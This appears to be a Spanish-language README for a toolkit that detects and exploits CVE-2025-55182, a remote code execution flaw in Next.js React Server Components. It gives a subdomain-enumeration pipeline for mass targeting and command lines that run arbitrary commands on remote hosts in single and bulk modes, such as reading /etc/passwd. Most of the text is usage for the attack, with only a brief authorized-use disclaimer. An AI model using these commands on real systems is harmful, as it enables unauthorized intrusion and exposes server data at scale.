
Escáner multilingüe para la RCE CVE-2025-55182 en React Server Components de Next.js, con modos de escaneo único y masivo, y flujo de trabajo integrado de reconocimiento para bug bounty.
Un kit de herramientas integral para detectar y explotar CVE-2025-55182, una vulnerabilidad crítica de ejecución remota de código en aplicaciones Next.js que utilizan React Server Components.
Este repositorio incluye un escáner Bash unificado (modo individual y masivo), implementaciones en Python/Go y un flujo de trabajo de reconocimiento para bug bounty.

Para la caza masiva en dominios comodín, usa este pipeline para filtrar objetivos antes de escanear:
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
El script scanner.sh admite escaneos de un solo objetivo y escaneo masivo desde un archivo con una lista.
chmod +x scanner.sh
Ideal para verificar un objetivo específico con salida detallada.
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Escanea de manera eficiente una lista de URLs y guarda los hosts vulnerables en un archivo.
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
Usa esta versión si encuentras problemas con el escape de caracteres especiales en Bash.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Alto rendimiento, dependencias mínimas.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Esta herramienta es solo para fines educativos y pruebas de seguridad autorizadas. El uso no autorizado es estrictamente ilegal. El desarrollador no asume ninguna responsabilidad por el mal uso o los daños causados por este programa.
Detalle del CVE en NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Aviso de seguridad de React (vulnerabilidad de React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Plantilla de Nuclei de ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Opción | Descripción |
|---|
-d, --domain | URL de un solo objetivo |
-l, --list | Archivo que contiene la lista de URLs |
-c, --command | Comando a ejecutar (por defecto: id) |
-o, --output | Archivo de salida para hosts vulnerables (por defecto: vulnerable_hosts.txt) |